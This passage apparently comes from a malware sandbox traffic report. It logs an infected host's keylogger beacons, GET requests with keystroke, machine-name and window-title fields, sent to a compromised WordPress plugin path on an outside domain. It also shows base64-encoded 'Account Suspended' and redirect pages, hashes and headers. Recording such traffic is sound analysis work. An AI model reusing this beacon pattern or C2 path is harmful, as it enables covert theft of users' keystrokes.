UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:53%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Wed, 30 Nov 2016 09:54:01 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
20 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:54%20AM text/html post.php 302 Found HTML 379.0 B 02/19/76 05:56:35
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9MTo1
NCUyMEFNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
7b0ff0b695943e6eb2f79c925c682b072e07102181145c96122f0f67e2eceac5
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:54%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Wed, 30 Nov 2016 09:54:02 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:54%20AM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
21 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=1:54%20AM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 02/19/76 12:37:31
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
